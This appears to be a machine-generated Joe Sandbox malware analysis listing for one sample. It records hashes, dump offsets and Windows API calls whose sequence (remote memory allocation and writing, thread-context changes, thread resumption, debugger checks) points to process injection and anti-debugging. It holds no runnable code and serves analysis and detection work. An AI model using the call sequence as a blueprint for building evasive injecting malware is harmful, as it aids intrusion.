                                                                                                              • Opcode ID: 147b8f45d904a3198618232f14474e3a7b92a717eaf0312b403bc1dc29fc11f2
                                                                                                              • Instruction ID: 424c55d1fa149cecb3075f40b8802374be0983df1749daea0b343c6f7bad30f1
                                                                                                              • Opcode Fuzzy Hash: 147b8f45d904a3198618232f14474e3a7b92a717eaf0312b403bc1dc29fc11f2
                                                                                                              • Instruction Fuzzy Hash: 98819075A08525CFCB14CF69D884AA9B7B5FF89304B24A165E446F7375D731EC40CBA0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1964375284.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e20000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Hq$Hq
                                                                                                              • API String ID: 0-925789375
                                                                                                              • Opcode ID: a02e72552ae2d37b5244499f1bad16efe507ba3143b54993d57a7ceb04f803be
                                                                                                              • Instruction ID: ab972ba0c21c9b2f38b187050864060d29b8414da14209d6db76e159bb1fb7bb
                                                                                                              • Opcode Fuzzy Hash: a02e72552ae2d37b5244499f1bad16efe507ba3143b54993d57a7ceb04f803be
                                                                                                              • Instruction Fuzzy Hash: 7B81DB30700224AFDB08EF65D829BAE7BA6EB88305F148129F506EB3C4DF749D41CB94
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1964375284.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_e20000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Hq$Hq
                                                                                                              • API String ID: 0-925789375
                                                                                                              • Opcode ID: 895ef44466fc9abd1fda4a201b823e91615854183b7453a886581ceacfc51908
                                                                                                              • Instruction ID: cff9fda619a383ca1ebdb5738bd43904b69e0a560417ff9fd0ea5c9c32a59bd6
                                                                                                              • Opcode Fuzzy Hash: 895ef44466fc9abd1fda4a201b823e91615854183b7453a886581ceacfc51908
                                                                                                              • Instruction Fuzzy Hash: 5241DE713002759FEB169F25EC05AAE7BE2FF89304F059569E806AB391DB38DC20C791
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 04FEAA06
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1971403525.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4fe0000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 4139908857-0
                                                                                                              • Opcode ID: a709a25fbf36f00ab29e25d6c7c1e9e907e2ef11bafb761a8062477aeb732b51
                                                                                                              • Instruction ID: ee207d8a5ba3c4a3edc9c6441b2a0a093db355eceaa2715dc3639af553ae4342
                                                                                                              • Opcode Fuzzy Hash: a709a25fbf36f00ab29e25d6c7c1e9e907e2ef11bafb761a8062477aeb732b51
                                                                                                              • Instruction Fuzzy Hash: 0E711370A00B058FEB24DF6AD45076ABBF1FF88205F008929D48AD7A50DB75F94ACB91
                                                                                                              APIs
                                                                                                              • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 0769FCFF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973533465.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7690000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              • Opcode ID: d5148365fe92684fbe1e0b8a7418647908596b5c2e7eb7dfffca5f88b81a1d6d
                                                                                                              • Instruction ID: d90d3f78b24e808178b7e142de2f5e3695f6da5542173e880f8d899c7be11e75
                                                                                                              • Opcode Fuzzy Hash: d5148365fe92684fbe1e0b8a7418647908596b5c2e7eb7dfffca5f88b81a1d6d
                                                                                                              • Instruction Fuzzy Hash: 865135B1E002099FCB04DFE9D8516EEBBF6EF89310F14842AD419B7354EB7499428FA1
                                                                                                              APIs
                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06121A02
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1972501213.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6120000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 716092398-0
                                                                                                              • Opcode ID: d7ac86ecdcd5bc7f2f98cd77c932be1dd6a16e179b8a50c2285d05568a776305
                                                                                                              • Instruction ID: 674673a41530c04fe74506e5676d73a457a403ce250b086819b21547e1ff3244
                                                                                                              • Opcode Fuzzy Hash: d7ac86ecdcd5bc7f2f98cd77c932be1dd6a16e179b8a50c2285d05568a776305
                                                                                                              • Instruction Fuzzy Hash: FA51C2B1D00359AFDF14CF9AC885ADEBBB5FF48310F24852AE819AB210D7759985CF90
                                                                                                              APIs
                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06121A02
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1972501213.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6120000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 716092398-0
                                                                                                              • Opcode ID: 2d39f7fc93858ad5bdbe02fa51f71d07948fdfc692cde4e6309000c00c43194f
                                                                                                              • Instruction ID: 3956d82fa6b51da638a39c866fe46ab809876d41efbabebe9710317e8df2394f
                                                                                                              • Opcode Fuzzy Hash: 2d39f7fc93858ad5bdbe02fa51f71d07948fdfc692cde4e6309000c00c43194f
                                                                                                              • Instruction Fuzzy Hash: E141C0B1D00359AFDF14CF9AC885ADEBBB5FF48310F24852AE819AB210D7759985CF90
                                                                                                              APIs
                                                                                                              • DeleteFileW.KERNELBASE(00000000), ref: 0757C920
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973308421.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7570000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DeleteFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 4033686569-0
                                                                                                              • Opcode ID: 2fd85e6cef06957dba172a4a5c027c964c064606a064949f5e64e0da1cc9bb93
                                                                                                              • Instruction ID: 0707984c168660334f6b4c42d5407291cf5644cf9acccb847547dffc5c398446
                                                                                                              • Opcode Fuzzy Hash: 2fd85e6cef06957dba172a4a5c027c964c064606a064949f5e64e0da1cc9bb93
                                                                                                              • Instruction Fuzzy Hash: 4C318EB180E7D55FC712CB65D8546D9BFB0AF07210F0981DBD495EB293D2385849CBB2
                                                                                                              APIs
                                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 06123F71
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1972501213.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_6120000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CallProcWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 2714655100-0
                                                                                                              • Opcode ID: abe13d7296485757cd9d00be376ed144726535cfaef34ce7bbcf83f276c49d5b
                                                                                                              • Instruction ID: d242020bb512153faf5cc43b549a4f0d3b8af658ef3d7628007235e4d0799234
                                                                                                              • Opcode Fuzzy Hash: abe13d7296485757cd9d00be376ed144726535cfaef34ce7bbcf83f276c49d5b
                                                                                                              • Instruction Fuzzy Hash: 9C4117B49003558FDB14CF99C448AABFBF5FB88314F258459E519A7361D738A841CBA1
                                                                                                              APIs
                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04FEFEEE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1971403525.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4fe0000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 983334009-0
                                                                                                              • Opcode ID: 7c6124f3a2ec26ace4c4c1f87a6eb1aac5c6d44f26623c5d62f57d531c0559e1
                                                                                                              • Instruction ID: 21e6932ff3a23d47db27256b7833240a7d49fb74c96e55ad7837774eeadb1231
                                                                                                              • Opcode Fuzzy Hash: 7c6124f3a2ec26ace4c4c1f87a6eb1aac5c6d44f26623c5d62f57d531c0559e1
                                                                                                              • Instruction Fuzzy Hash: 93218C71D003499FDB10DFAAC4817EEBBF5EF89320F14842AD459A7641CB78A985CFA1
                                                                                                              APIs
                                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 00AF031D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1963896873.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_af0000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessagePost
                                                                                                              • String ID:
                                                                                                              • API String ID: 410705778-0
                                                                                                              • Opcode ID: 29e5fa84aa5ca53d2af40ec90144a9315ca3c551e720f041f15013a8d78a5834
                                                                                                              • Instruction ID: fb1bd9cc6c1881d79dab6bf2cc46e7e6052ced8544bc2fc131ac6dca02e2de65
                                                                                                              • Opcode Fuzzy Hash: 29e5fa84aa5ca53d2af40ec90144a9315ca3c551e720f041f15013a8d78a5834
                                                                                                              • Instruction Fuzzy Hash: BF21E071D0421C8BEF20DBE5D944BEEBBF4AF88310F144159EA45BB242CB795D44CBA1
                                                                                                              APIs
                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0769F878
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973533465.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7690000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0
                                                                                                              • Opcode ID: 3979530a8d5a8f3c638f79dadb3a4a12cd456b23ab2c847f74e210f4fa774a88
                                                                                                              • Instruction ID: 07d97bd45f08f9cda5e71c34f0fb6aed4517e0f377cde7f22c7ae8c14303a902
                                                                                                              • Opcode Fuzzy Hash: 3979530a8d5a8f3c638f79dadb3a4a12cd456b23ab2c847f74e210f4fa774a88
                                                                                                              • Instruction Fuzzy Hash: 412106B19003599FDF10DFA9C9857DEBBF5FF48310F148429E919A7250D7789941CBA0
                                                                                                              APIs
                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0769F878
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973533465.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7690000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0
                                                                                                              • Opcode ID: 44c635bae0acae05e8e67c2e2b22a941e57cd2c84bed13370ee56707b9ef1a84
                                                                                                              • Instruction ID: b268ce7fff2daeca3dfde18c6a96e92fe89ee3c3fc23a59a10318f8d72290528
                                                                                                              • Opcode Fuzzy Hash: 44c635bae0acae05e8e67c2e2b22a941e57cd2c84bed13370ee56707b9ef1a84
                                                                                                              • Instruction Fuzzy Hash: 572115B19003599FDB10CFAAC985BDEBBF5FF48310F108429E919A7240D7789941CBA0
                                                                                                              APIs
                                                                                                              • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 04FE026F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1971403525.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4fe0000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CheckDebuggerPresentRemote
                                                                                                              • String ID:
                                                                                                              • API String ID: 3662101638-0
                                                                                                              • Opcode ID: dddbe10ad5bcfc2b5d325d0a39bc7214411e5d81686216859baf75acf7165a6e
                                                                                                              • Instruction ID: c04846b5d81a024879f7bb17fa6f52020a210a1fe9844ed699306d6beff0f958
                                                                                                              • Opcode Fuzzy Hash: dddbe10ad5bcfc2b5d325d0a39bc7214411e5d81686216859baf75acf7165a6e
                                                                                                              • Instruction Fuzzy Hash: 332145B1C012598FDB10CFAAD885BEEFBF4EF49310F14841AE859A7250D778A945CF61
                                                                                                              APIs
                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0769D3D3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973533465.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7690000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              • Opcode ID: 4adb8dc47df5b8268cc24c8c533c36d7548602f477cf073fd20ac4e14e722dc7
                                                                                                              • Instruction ID: 781aa35d38e3524ace070abb1a0fc91559cb078adc4491bbaa8d35c585ae2651
                                                                                                              • Opcode Fuzzy Hash: 4adb8dc47df5b8268cc24c8c533c36d7548602f477cf073fd20ac4e14e722dc7
                                                                                                              • Instruction Fuzzy Hash: 2C2126B590425A9FDB10CFAAC485BDEFBF8EF49310F10842AE458A7251D378A544CFA1
                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,04FED056,?,?,?,?,?), ref: 04FED117
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1971403525.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4fe0000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0
                                                                                                              • Opcode ID: 3b86d09266e2cbb80688beb556dc484fd0e9f70787ee8447275b3df737be1e00
                                                                                                              • Instruction ID: 01685598f4005a449c5a294931a2c80d529533e67af980d0075392691d75d766
                                                                                                              • Opcode Fuzzy Hash: 3b86d09266e2cbb80688beb556dc484fd0e9f70787ee8447275b3df737be1e00
                                                                                                              • Instruction Fuzzy Hash: 5521E5B5D00349AFDB10CF9AD484BEEBBF5EB48310F14841AE918A3350D379A951CFA5
                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,04FED056,?,?,?,?,?), ref: 04FED117
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1971403525.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4fe0000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0
                                                                                                              • Opcode ID: 26eb32316e65e192c2da93484bda275bc71c5da4425df0ab025ffd3c256fd51a
                                                                                                              • Instruction ID: be2efec559b338dd3d0c30a213d0f27118b19a6d61cf89a61834465c99756376
                                                                                                              • Opcode Fuzzy Hash: 26eb32316e65e192c2da93484bda275bc71c5da4425df0ab025ffd3c256fd51a
                                                                                                              • Instruction Fuzzy Hash: 5721E4B5D003599FDB10CF9AD884ADEFBF9EB48310F14841AE918A3310D379A945CFA5
                                                                                                              APIs
                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04FEFEEE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1971403525.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4fe0000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 983334009-0
                                                                                                              • Opcode ID: 355dc58fbe5011cecb2983f5c2be52acff8b664726e60c7b603235b037720e2a
                                                                                                              • Instruction ID: fcd43b0a472ca8758d5501fc5fc7a8a89585c48b21a60c0778f47c287c101b45
                                                                                                              • Opcode Fuzzy Hash: 355dc58fbe5011cecb2983f5c2be52acff8b664726e60c7b603235b037720e2a
                                                                                                              • Instruction Fuzzy Hash: 7A214971D003089FDB10DFAAC4857EEBBF5EF48320F14842AD419A7241CB78A945CFA1
                                                                                                              APIs
                                                                                                              • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0791FA1E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973711422.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7910000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 983334009-0
                                                                                                              • Opcode ID: e3c16d56af874ab31b28d5e9e104bc0d5f8e4fe22f64df162e11c731cd61b87f
                                                                                                              • Instruction ID: 5c31fe6536794cc7e5d5e1c838a7a95f964deb2fa276101b0ce1140287dccae8
                                                                                                              • Opcode Fuzzy Hash: e3c16d56af874ab31b28d5e9e104bc0d5f8e4fe22f64df162e11c731cd61b87f
                                                                                                              • Instruction Fuzzy Hash: 7D2115B1D007099FDB10DFAAC4857EEBBF5EF48324F14842AD459A7240DB78A985CFA0
                                                                                                              APIs
                                                                                                              • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 0769FCFF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973533465.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7690000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              • Opcode ID: c537faf3f782d812bb2b2417034f5464efc4e9bf92e22d41fec00f8419f6ef36
                                                                                                              • Instruction ID: 21969eff10d21f500c0a83831fa7ee0c4e95326095d7f386214ad790687916f7
                                                                                                              • Opcode Fuzzy Hash: c537faf3f782d812bb2b2417034f5464efc4e9bf92e22d41fec00f8419f6ef36
                                                                                                              • Instruction Fuzzy Hash: F72137B1C007499FDB20DFAAC4447EEBBF5EF48320F148429D459A7250DB799945CFA1
                                                                                                              APIs
                                                                                                              • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 0769FCFF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973533465.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7690000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              • Opcode ID: 6157a66178235a88fa432c4eb116bd78cdf7c1d6645554202ffb36cd77d8780e
                                                                                                              • Instruction ID: bd7966b421ceb4433934c34af58dae28d56d8d8bfce4cc06370abf2b222d4323
                                                                                                              • Opcode Fuzzy Hash: 6157a66178235a88fa432c4eb116bd78cdf7c1d6645554202ffb36cd77d8780e
                                                                                                              • Instruction Fuzzy Hash: 3B2104B1D003499FDB10DFAAC484BEEBBF5EF48320F148429E519A7240DB79A945CFA1
                                                                                                              APIs
                                                                                                              • DeleteFileW.KERNELBASE(00000000), ref: 0757C920
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973308421.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7570000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DeleteFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 4033686569-0
                                                                                                              • Opcode ID: 512d58c1d270cd545e55509f91e1404ad4138839f0dd399be29b4ab870b90696
                                                                                                              • Instruction ID: 14205da5d0072b71e0f846731e186d0f757e56a5c740837ca242df05a89b34b1
                                                                                                              • Opcode Fuzzy Hash: 512d58c1d270cd545e55509f91e1404ad4138839f0dd399be29b4ab870b90696
                                                                                                              • Instruction Fuzzy Hash: 792138B1C0065A9BDB20CF9AD445BEEFBF4FF48320F14852AD858A7240D778A941CFA5
                                                                                                              APIs
                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 07916843
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973711422.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7910000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              • Opcode ID: b8be9c0df169235665f1bc0eabb0492b512c9c4393613672902906c9908b61ac
                                                                                                              • Instruction ID: e975294723a50a76baaf1437c814fd7f1143b113c6fcd791e6466b1194c75684
                                                                                                              • Opcode Fuzzy Hash: b8be9c0df169235665f1bc0eabb0492b512c9c4393613672902906c9908b61ac
                                                                                                              • Instruction Fuzzy Hash: CF2124B5D002499FCB10CF9AC484BDEFBF4FB48320F10842AE858A7650D778A584CFA1
                                                                                                              APIs
                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0769D3D3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973533465.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7690000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              • Opcode ID: 3246606f856c825d7210dc1054360886d69cfbd43c2b89f66ee097ea42e160f3
                                                                                                              • Instruction ID: d4bc9a78b5a0504b51e75200725b91c6174920e7db0534b0aaa5d09a644cb227
                                                                                                              • Opcode Fuzzy Hash: 3246606f856c825d7210dc1054360886d69cfbd43c2b89f66ee097ea42e160f3
                                                                                                              • Instruction Fuzzy Hash: 3621D3B59002499FDB10DF9AC484BDEFBF8EF49320F10842AE959A7250D778A945CFA1
                                                                                                              APIs
                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0769F516
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973533465.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7690000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              • Opcode ID: 18d841d8142f190ed8c2aa14ede2611ae0a9cafc63dbf933d1245ef0efccc256
                                                                                                              • Instruction ID: 899fc02793303f578b9d22e0cc4e0c97f3b9a3c33989876a613d0f0802a88233
                                                                                                              • Opcode Fuzzy Hash: 18d841d8142f190ed8c2aa14ede2611ae0a9cafc63dbf933d1245ef0efccc256
                                                                                                              • Instruction Fuzzy Hash: 241129719007499FDF20DFAAD8447DEBBF5EF88320F14881AE559A7250CB7A9941CFA0
                                                                                                              APIs
                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 07916843
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973711422.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7910000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              • Opcode ID: 863b15d51871a3e611a7c2d7aacac0d5ae6e1d99e20c1ba6594793d988aae222
                                                                                                              • Instruction ID: 948273b5061c817331de1f5ad3fa72f363c088344e448060b9b3c3da35268b02
                                                                                                              • Opcode Fuzzy Hash: 863b15d51871a3e611a7c2d7aacac0d5ae6e1d99e20c1ba6594793d988aae222
                                                                                                              • Instruction Fuzzy Hash: FC21D3B5D002499FDB10DF9AC484BDEFBF4EB48320F108429E958A7650D778A945CFA1
                                                                                                              APIs
                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0769F516
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973533465.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7690000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              • Opcode ID: 0698be33bc76a7d6077d8937b0ec3bc8137a70232379552f2d9c868cf5687d74
                                                                                                              • Instruction ID: 2d2681d383458e7df1c3bc71278872cdbba4630a83931b03a9277e0d9eef5b98
                                                                                                              • Opcode Fuzzy Hash: 0698be33bc76a7d6077d8937b0ec3bc8137a70232379552f2d9c868cf5687d74
                                                                                                              • Instruction Fuzzy Hash: F11137719003499FDF20DFAAC844BDEBBF5EF48320F148819E519A7250CB79A941CFA0
                                                                                                              APIs
                                                                                                              • OutputDebugStringW.KERNELBASE(00000000), ref: 04FE1A90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1971403525.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4fe0000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DebugOutputString
                                                                                                              • String ID:
                                                                                                              • API String ID: 1166629820-0
                                                                                                              • Opcode ID: 55adf9a21149f1dde590f8e8d30906d18a1d0263e8c1d9cfff42d2708bfeab82
                                                                                                              • Instruction ID: bf31e7fb7e734fe484e4f4181c34bf50d609117784ca1bc221622451d13573a9
                                                                                                              • Opcode Fuzzy Hash: 55adf9a21149f1dde590f8e8d30906d18a1d0263e8c1d9cfff42d2708bfeab82
                                                                                                              • Instruction Fuzzy Hash: 601126B1D006199FCB14CF9AD544BEEFBB4FB48710F10821AD828A3250D774A646CFA1
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1973308421.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7570000_5qJ6QQTcRS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ResumeThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 947044025-0
                                                                                                              • Opcode ID: a37fa88fd364289d5d8461d7035b38fd922669b6375d233c10beaec861dac16b
                                                                                                              • Instruction ID: 30e2c08943b1efc11f4facd413eaf22d372593da9b397beac24c2d9777622b97
                                                                                                              • Opcode Fuzzy Hash: a37fa88fd364289d5d8461d7035b38fd922669b6375d233c10beaec861dac16b
                                                                                                              • Instruction Fuzzy Hash: 9F115BB1D003099FDB60DBA9E4457EEBBF4EB84214F20849AC518A7290DB795986CB91
                                                                                                              APIs
